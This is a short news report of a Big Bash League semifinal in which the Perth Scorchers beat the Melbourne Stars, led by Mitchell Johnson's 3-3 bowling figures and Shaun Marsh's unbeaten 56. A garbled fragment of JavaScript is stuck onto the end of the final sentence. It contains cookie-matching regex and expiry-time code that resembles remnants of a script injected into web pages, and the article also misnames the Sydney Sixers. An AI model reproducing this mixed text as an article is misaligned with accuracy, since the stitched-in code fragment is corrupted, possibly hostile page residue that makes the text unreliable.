Mitchell Johnson and Shaun Marsh have led the Perth Scorchers to a clinical seven-wicket win over the Melbourne Stars in the Big Bash semifinal on Tuesday night to secure a home final this Saturday.

The Scorchers advanced to their fifth final on the back on an astonishing display of bowling from former Australian Test quick, Mitchell Johnson.

The Stars, who have reached the semifinals in every year of the tournament, but only managed to advance to one final, were sent into bat by the hosts, who restricted the visitors to just 8-136.

Johnson claimed two wickets in the very first over of the match, removing both Rob Quiney (first ball) and Luke Wright (fourth ball) for ducks. He then removed the danger man Kevin Pietersen soon after for five, leaving the Stars reeling at 3-21 after 4.1 overs. Johnson finished with incredible figures of 3-3 from his four overs with 21 dot balls.

Marcus Stoinis then fell the very next over, also for five, leaving Melbourne at 4-26.

Captain David Hussey and Seb Gotch led a mini revival, scoring 26 and 48 respectively, but the damage was already done.

The Scorchers never really looked troubled in response, reaching the target with only three wickets down and just over three overs to spare.

Michael Klinger was removed for just seven in the second over, giving the Stars a glimmer of hope, however, Shaun Marsh ensured that was soon dashed, scoring an unbeaten 56 from 44 balls coming in at number three. He was helped by handy cameos from Sam Whiteman (31) and Ian Bell (26 not out).

The Scorchers will host either the Brisbane Heat or the Sydney Sixes at the WACA ground on Saturday evening. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
